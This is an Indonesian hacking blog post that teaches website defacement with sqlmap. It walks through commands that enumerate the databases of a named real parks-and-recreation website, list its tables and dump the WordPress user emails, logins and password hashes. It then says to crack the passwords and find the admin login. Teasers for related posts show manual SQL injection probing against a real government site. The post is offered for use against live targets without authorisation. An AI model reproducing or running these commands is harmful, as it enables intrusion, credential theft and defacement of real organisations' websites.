Cara deface Sqlmap live target

-
      Kali ini ane mau posting tentang deface, Yup cara deface dengan SQLMAP di Windows, oke langsung simak aja tutorial nya 
 Alat perang :
>Sqlmap
>Python
>Google Dork
   yng pertama, instal dulu python nya, lalu taro file SQLMAP nya di C:/sqlmap
buka CMD, ente pergi ke direktori SQLMAP yang ada di  C:/sqlmap, dengan perintah> cd C:/sqlmap
lalu ketikan perintah >sqlmap.py untuk menjalankan SQLMAP
 Lalu ketikan Perintah> sqlmap.py -u https://target.com --dbs perintah ini untuk melihat isi database
 Contoh:> sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 --dbs
nah, ada 3 database di situs https://www.bransonparksandrecreation.com/



Ane pilih database blrpwp, masukan perintah > sqlmap.py -u https://target.com -D nama_db --tables Contoh:>sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 -D blrpwp --tables
ada 34 tables didalem database blrpwp



Skrng cari tabel admin/user/auth/login,dll yng berhubungan dengan administrator.
Contoh: wp_users
Ketikan perintah>sqlmap.py -u https:/target.com -D nama_db -T nama_table --column
Contoh:sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 -D blrpwp -C wp_users  --column

Ketikkan perintah > sqlmap.py -u http://target.com -D nama_db -T nama_tabel -C kolom1,kolom2,kolom2,dst --dump untuk melihat isi dari kolom tersebut.
contoh: sqlmap.py -u https://www.bransonparksandrecreation.com/page.php?id=38 -D blrpwp -T wp_users -C user_email,user_login,user_pass -dump 
Nah skrng udh dapet dapet kan data nya tinggal decrypt password nya and cari tempat admin login nya :)

Comments

Post a Comment

Popular posts from this blog

tutorial deface sql injection

-
Image
Pada Tutorial Kali ini ,Saya akan Share Tutorial Deface Sql Manual dork :  - inurl:/staff.php?id= - inurl:/news.php?id= kembangin sendiri gan. Nah Langsung Aja Karena Saya Udah Nemu Situs Yang Vuln Sql ,Oh iya Untuk Mengetahui Vuln Atau Tidak Kalian Hanya Perlu Masukan tanda ( ' ) di belakang angka Id nya, Contoh : http://www.utama.tegalkab.go.id/artikel.php?id=113' Nah Kek gitu deh, maka muncul  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 jika sudah ketemu ,kalian tinggal masukan +order+by+1--+- ,Jadinya : http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+1--+- Kalian Terusin Sampai Ketemu Error ,jadinya http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+1--+- => Ga error http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+2--+- Ga error http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+
Read more

Mengapa terjadi bypass admin??

-
Image
Mengapa Terjadi Bypass Admin? @Copyright by  MDaffa15ev Hehe, nyoba cari” di  db-exploit.com/papers  ada post yang menarik judulnya ” [Indonesian] Simple Technique for SQLi Form Login Bypass” buatan si haripinter. Waktu baca” lumayan menarik :V,  bagaimana kok bisa terjadi bypass admin? Ini penjelasan sederhananya. Konten : 1. Pendahuluan 2. Sekilas tentang SQLi pada Form Login 3. Contoh Serangan 4. Penanggulangan Sederhana #1. Pendahuluan SQL Injection merupakan salah teknik eksploitasi web yang cukup lama, namun hingga saat ini teknik tersebut masih cukup mumpuni dan efektif untuk dilakukan. Buktinya saat ini masih ada saja (dan banyak) website yang mengidap penyakit vuln terhadap serangan SQL Injection. Inti dari penyebab bug ini yaitu terletak pada si pembuat web (web programmer), anggap saja ada kesalahan logika berpikir atau ketidaktahuaannya dalam membuat website yang aman. Saya tekankan sekali lagi, masalah bug ini terletak pada diri
Read more